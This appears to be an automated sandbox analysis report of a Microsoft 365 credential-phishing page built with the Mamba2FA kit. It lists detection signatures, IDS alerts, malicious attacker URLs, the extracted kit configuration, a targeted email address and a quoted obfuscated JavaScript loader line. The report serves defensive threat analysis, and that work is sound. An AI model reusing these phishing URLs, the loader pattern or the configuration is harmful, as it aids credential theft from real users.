Edit tour

Windows Analysis Report
https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com

Overview

General Information

Sample URL:https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
Analysis ID:1650178
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:96
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
AI detected suspicious Javascript
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
No HTML title found
Suricata IDS alerts with low severity for network traffic
URL contains potential PII (phishing indication)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5032 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
{
  "sv": "o365_1_nom",
  "rand": "NHNuU2c=",
  "uid": "USER04032025U29030403"
}
SourceRuleDescriptionAuthorStrings
0.2.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.3.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        0.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
          0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-27T14:41:19.812852+010020566432Possible Social Engineering Attempted192.168.2.549732104.21.70.232443TCP
            2025-03-27T14:41:42.913312+010020566432Possible Social Engineering Attempted192.168.2.549773104.21.70.232443TCP
            2025-03-27T14:41:46.737180+010020566432Possible Social Engineering Attempted192.168.2.549774104.21.70.232443TCP
            2025-03-27T14:41:49.861428+010020566432Possible Social Engineering Attempted192.168.2.549785104.21.70.232443TCP
            2025-03-27T14:41:53.108461+010020566432Possible Social Engineering Attempted192.168.2.549797104.21.70.232443TCP
            2025-03-27T14:41:56.201164+010020566432Possible Social Engineering Attempted192.168.2.549808104.21.70.232443TCP
            2025-03-27T14:41:59.264797+010020566432Possible Social Engineering Attempted192.168.2.549819104.21.70.232443TCP
            2025-03-27T14:42:02.595155+010020566432Possible Social Engineering Attempted192.168.2.549830104.21.70.232443TCP
            2025-03-27T14:42:05.820985+010020566432Possible Social Engineering Attempted192.168.2.549841104.21.70.232443TCP
            2025-03-27T14:42:09.355526+010020566432Possible Social Engineering Attempted192.168.2.549852104.21.70.232443TCP
            2025-03-27T14:42:13.142082+010020566432Possible Social Engineering Attempted192.168.2.549863104.21.70.232443TCP
            2025-03-27T14:42:16.443109+010020566432Possible Social Engineering Attempted192.168.2.549877104.21.70.232443TCP
            2025-03-27T14:42:20.259544+010020566432Possible Social Engineering Attempted192.168.2.549889104.21.70.232443TCP
            2025-03-27T14:42:23.917746+010020566432Possible Social Engineering Attempted192.168.2.549907104.21.70.232443TCP
            2025-03-27T14:42:27.796430+010020566432Possible Social Engineering Attempted192.168.2.549918104.21.70.232443TCP
            2025-03-27T14:42:31.101630+010020566432Possible Social Engineering Attempted192.168.2.549930104.21.70.232443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-27T14:41:18.161651+010020573331Successful Credential Theft Detected192.168.2.549727104.21.70.232443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=ceGoATplRk4sAOILAAe3Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=tT5WNbS8nK_GmKtDAAfCAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfWAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfWAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=3KIffrGciGku9LcFAAe0Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=LP9pboDna7Lg8G9ZAAfhAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcEgAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfCAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrc-mAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmv&sid=EMzR_z9H-w08ZyAdAAfcAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfCAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=7qMH1QkTS0k0NzOqAAfQAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=F0YwhNqusdKEacySAAfIAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfIAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfIAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmu&sid=EMzR_z9H-w08ZyAdAAfcAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=aHb_mt7ltpbxBIUjAAfLAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmGXAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNreWwAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=cDcq_6oiPpEKxHw5AAe_Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlUiAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=gGEhwn_6LXzjgi5BAAfTAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfTAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=2YiBHHEGh1iHOHKNAAfWAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfLwAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfLAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjeoAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrikjAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=sOtA6zh2FsG50UT0AAfZAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrnFWAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWi&sid=p_0vHNI0wq1dN5-_AAflAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfLAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkYNAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrg8SAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=t010Hy5o6-DrcLMyAAe8Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdm-Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbOFAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhrxAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkB&sid=LP9pboDna7Lg8G9ZAAfhAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfTAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=p_0vHNI0wq1dN5-_AAflAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWh&sid=p_0vHNI0wq1dN5-_AAflAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8Avira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraPWAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgxyAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkC&sid=LP9pboDna7Lg8G9ZAAfhAvira URL Cloud: Label: malware
            Source: https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=EMzR_z9H-w08ZyAdAAfcAvira URL Cloud: Label: malware
            Source: 0.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "NHNuU2c=", "uid": "USER04032025U29030403"}

            Phishing

            barindex
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'www.oyabarista.com' does not match the legitimate domain for Microsoft., The domain 'oyabarista.com' does not have any known association with Microsoft., The URL does not contain any recognizable elements related to Microsoft, which is suspicious., The presence of a completely unrelated domain name suggests a high likelihood of phishing. DOM: 0.2.pages.csv
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: Yara matchFile source: 0.3.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 0.3.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZy... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: (new function(atob(this.dataset.digest)))();
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: {"screen":{"availWidth":1280,"availHeight":984,"width":1280,"height":1024,"colorDepth":24,"pixelDepth":24,"availLeft":0,"availTop":0,"orientation":"[object ScreenOrientation]","onchange":null,"isExtended":false,"addEventListener":"function addEventListener() { [native code] }","dispatchEvent":"function dispatchEvent() { [native code] }","removeEventListener":"function removeEventListener() { [native code] }","!!":[]},"window":{"window":"[object Window]","self":"[object Window]","document":"[object HTMLDocument]","name":"","location":"https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com","customElements":"[object CustomElementRegistry]","history":"[object History]","navigation":"[object Navigation]","locationbar":"[object BarProp]","menubar":"[object BarProp]","personalbar":"[object BarProp]","scrollbars":"[object BarProp]","statusbar":"[object BarProp]","toolbar":"[object BarProp]","status":"","closed":false,"frames":"[object Window]","length":0,"top":"[object Window]","opener":null,"parent":"[object Window]","frameElement":null,"navigator":"[object Navigator]","origin":"https://www.oyabarista.com","external":"[object External]","screen":"[object Screen]","innerWidth":1280,"innerHeight":897,"scrollX":0,"pageXOffset":0,"scrollY":0,"pageYOffset":0,"visualViewport":"[object VisualViewport]","screenX":0,"screenY":0,"outerWidth":1280,"outerHeight":984,"devicePixelRatio":1,"event":"[object Event]","clientInformation":"[object Navigator]","screenLeft":0,"screenTop":0,"styleMedia":"[object StyleMedia]","onsearch":null,"trustedTypes":"[object TrustedTypePolicyFactory]","performance":"[object Performance]","onappinstalled":null,"onbeforeinstallprompt":null,"crypto":"[object Crypto]","indexedDB":"[object IDBFactory]","sessionStorage":"[object Storage]","localStorage":"[object Storage]","onbeforexrselect":null,"onabort":null,"onbeforeinput":null,"onbeforematch":null,"onbeforetoggle":null,"onblur":null,"oncancel":null,"oncanplay":null,"oncanplaythrough":null,"onchange":null,"onclick":null,"onclose":null,"oncontentvisibilityautostatechange":null,"oncontextlost":null,"oncontextmenu":null,"oncontextrestored":null,"oncuechange":null,"ondblclick":null,"ondrag":null,"ondragend":null,"ondragenter":null,"ondragleave":null,"ondragover":null,"ondragstart":null,"ondrop":null,"ondurationchange":null,"onemptied":null,"onended":null,"onerror":null,"onfocus":null,"onformdata":null,"oninput":null,"oninvalid":null,"onkeydown":null,"onkeypress":null,"onkeyup":null,"onload":null,"onloadeddata":null,"onloadedmetadata":null,"onloadstart":null,"onmousedown":null,"onmouseenter":null,"onmouseleave":null,"onmousemove":null,"onmouseout":null,"onmouseover":null,"onmouseup":null,"onmousewheel":null,"onpause":null,"onplay":null,"onplaying":null,"onprogress":null,"onratechange":null,"onreset":null,"onresize":null,"onscroll":null,"onsecuritypolicyviolation":null,"onseeked":null,"onseeking":null,"onselect":null,"onslotch
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Number of links: 0
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Title: Authenticating ... does not match URL
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Forgot password?
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Terms of use
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Privacy & cookies
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Terms of use
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Privacy & cookies
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Terms of use
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: Invalid link: Privacy & cookies
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: HTML title missing
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comSample URL: PII: N0123Ninfo@kostal.com
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: <input type="password" .../> found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No favicon
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No favicon
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No favicon
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No favicon
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="author".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="author".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="author".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="author".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="copyright".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="copyright".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="copyright".. found
            Source: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.5:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.44.201.164:443 -> 192.168.2.5:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.168.73.27:443 -> 192.168.2.5:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.5:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.168.189:443 -> 192.168.2.5:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49808 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49901 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49930 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.5:49727 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49732 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49773 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49830 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49808 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49819 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49889 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49774 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49841 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49930 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49907 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49785 -> 104.21.70.232:443
